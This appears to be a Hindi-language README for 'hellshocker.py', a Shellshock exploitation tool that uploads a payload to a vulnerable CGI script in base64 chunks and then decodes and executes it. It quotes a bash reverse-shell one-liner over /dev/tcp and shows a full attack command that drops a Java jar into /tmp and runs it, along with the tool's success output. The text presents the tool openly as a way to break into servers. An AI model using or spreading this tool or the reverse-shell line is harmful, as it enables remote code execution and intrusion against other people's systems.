
Shellshock शोषण स्क्रिप्ट जो अपनी बहुमुखी प्रतिभा के कारण किसी भी vector का उपयोग करके अपलोड और RCE करने में सक्षम है।
कमजोर shellshock एक्सप्लॉइट्स का उपयोग करके या सिर्फ "/bin/bash >& /dev/tcp/IP/port 0>&1" के माध्यम से सर्वर में घुसने से थक गए हैं?
हाँ, आपको सर्वर पर कुछ अधिक जटिल अपलोड और निष्पादित करने की आवश्यकता है, और एक बड़ी फ़ाइल को base64 में एनकोड करना आपके HTTP अनुरोध के लिए वेब-सर्वर द्वारा स्वीकार किए जाने के लिए असंभव है।
आपकी समस्याएं इस उपकरण के साथ समाप्त हो सकती हैं। यह आपके पेलोड को base64 में एनकोड करने और इसे (डिफ़ॉल्ट रूप से) 128 बाइट्स के हिस्सों में वेबसर्वर को भेजने में सक्षम है, और फिर, भेजे जाने के बाद, यह डिकोड और निष्पादित हो जाता है।
"वाह", आप कहते हैं, "लेकिन मेरे पास PHP नहीं है, मुझे Java के लिए कुछ चाहिए।" कोई समस्या नहीं, मैं कहता हूँ, यह उपकरण अत्यधिक अनुकूलन योग्य है।
बस इसे देखें:
python hellshocker.py --cgi http://website.com/cgi-bin/vulnerable --payload "java.jar" --destination "/tmp/java.jar" --trigger "/usr/bin/java -jar /tmp/java.jar" --base64
[*] Splitting data into chunks ...
[+] Payload data has been encoded to base64 format.
[*] There is 19 chunks to be sent to remote server
[*] Starting payload upload ...
[*] Uploading chunk #1
[*] Uploading chunk #2
[*] Uploading chunk #3
[*] Uploading chunk #4
[*] Uploading chunk #5
[*] Uploading chunk #6
[*] Uploading chunk #7
[*] Uploading chunk #8
[*] Uploading chunk #9
[*] Uploading chunk #10
[*] Uploading chunk #11
[*] Uploading chunk #12
[*] Uploading chunk #13
[*] Uploading chunk #14
[*] Uploading chunk #15
[*] Uploading chunk #16
[*] Uploading chunk #17
[*] Uploading chunk #18
[*] Uploading chunk #19
[+] Upload procedure has been completed.
[*] Decoding base64-encoded payload on remote server ...
[+] Remote command for decoding has been sent successfully sent.
[*] Triggering payload to execute ...
[+] Trigger command for payload execution has been succesfully sent.
फिर आपका पेलोड सफलतापूर्वक स्थानांतरित और निष्पादित हो गया। कूल, है ना? हाँ, यह है।